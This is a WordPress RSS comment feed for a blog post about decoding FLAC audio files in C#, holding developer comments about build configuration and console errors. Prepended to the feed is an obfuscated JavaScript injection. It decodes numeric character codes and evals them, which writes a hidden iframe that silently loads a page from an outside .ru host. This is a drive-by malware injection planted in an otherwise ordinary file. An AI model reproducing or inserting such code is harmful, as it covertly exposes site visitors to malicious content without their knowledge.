<script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i67i58i83i83i78i77i62i7i75i78i8i60i72i78i71i77i14i7i73i65i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i66i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i75i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i76i75i60i0i5i0i65i77i77i73i19i8i8i67i58i83i83i78i77i62i7i75i78i8i60i72i78i71i77i14i7i73i65i73i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i72i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i10i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i86'][0].split('i');v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);}if(f)z=s;e(z);</script><?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/2.0.1" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
	<title>Comments on: Decoding FLAC audio files in C#</title>
	<link>/blog/2010/07/26/decoding-flac-audio-files-in-c/</link>
	<description></description>
	<pubDate>Thu, 17 May 2012 21:50:52 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.0.1</generator>

	<item>
		<title>by: Ray</title>
		<link>/blog/2010/07/26/decoding-flac-audio-files-in-c/#comment-114028</link>
		<pubDate>Tue, 08 May 2012 01:57:42 +0000</pubDate>
		<guid>/blog/2010/07/26/decoding-flac-audio-files-in-c/#comment-114028</guid>
					<description>For those running into errors and had to convert the project from VS20XX to VS2010+, make sure that you're not building for &quot;Any CPU&quot;. Create build configuration for x86, and it should work out for you.</description>
		<content:encoded><![CDATA[<p>For those running into errors and had to convert the project from VS20XX to VS2010+, make sure that you&#8217;re not building for &#8220;Any CPU&#8221;. Create build configuration for x86, and it should work out for you.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>by: OneBuckFilms</title>
		<link>/blog/2010/07/26/decoding-flac-audio-files-in-c/#comment-108936</link>
		<pubDate>Thu, 29 Dec 2011 17:26:19 +0000</pubDate>
		<guid>/blog/2010/07/26/decoding-flac-audio-files-in-c/#comment-108936</guid>
					<description>Thank you for posting your code here.

It is extremely useful to see this, and I'm using the code for a personal project.

I might humbly suggest perhaps implementing an event system for reporting status and progress within those callbacks, so that the classes can be separated from the console class, as the code can be used in non-console applications (perhaps a Windows Forms app, which is what I'm developing).

I may try and make such changes myself, and converting the code to VB.NET for myself.

Really nice work wrapping the FLAC and WAV APIs.</description>
		<content:encoded><![CDATA[<p>Thank you for posting your code here.</p>
<p>It is extremely useful to see this, and I&#8217;m using the code for a personal project.</p>
<p>I might humbly suggest perhaps implementing an event system for reporting status and progress within those callbacks, so that the classes can be separated from the console class, as the code can be used in non-console applications (perhaps a Windows Forms app, which is what I&#8217;m developing).</p>
<p>I may try and make such changes myself, and converting the code to VB.NET for myself.</p>
<p>Really nice work wrapping the FLAC and WAV APIs.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>by: Stefano Corti</title>
		<link>/blog/2010/07/26/decoding-flac-audio-files-in-c/#comment-99057</link>
		<pubDate>Sun, 30 Jan 2011 16:46:28 +0000</pubDate>
		<guid>/blog/2010/07/26/decoding-flac-audio-files-in-c/#comment-99057</guid>
					<description>I also get the error in the console application CANNOT PROCESS UNTIL EOF</description>
		<content:encoded><![CDATA[<p>I also get the error in the console application CANNOT PROCESS UNTIL EOF
</p>
]]></content:encoded>
				</item>
	<item>
		<title>by: Stefano Corti</title>
		<link>/blog/2010/07/26/decoding-flac-audio-files-in-c/#comment-99056</link>
		<pubDate>Sun, 30 Jan 2011 16:41:16 +0000</pubDate>
		<guid>/blog/2010/07/26/decoding-flac-audio-files-in-c/#comment-99056</guid>
					<description>OK The Wav 2 Flac encoder (even if you have to declare the calling convention in DllImport under VS2010 in order to avoid the &quot;StackImbalance&quot; exception)
The Wav 2 Flac doesn't work (I use VS2010) - I always get the error in the console &quot;Cannot Open File Stream&quot; 
I don't know how to fix it!
Please help!

Stefano (IT)</description>
		<content:encoded><![CDATA[<p>OK The Wav 2 Flac encoder (even if you have to declare the calling convention in DllImport under VS2010 in order to avoid the &#8220;StackImbalance&#8221; exception)<br />
The Wav 2 Flac doesn&#8217;t work (I use VS2010) - I always get the error in the console &#8220;Cannot Open File Stream&#8221;<br />
I don&#8217;t know how to fix it!<br />
Please help!</p>
<p>Stefano (IT)
</p>
]]></content:encoded>
				</item>
</channel>
</rss>

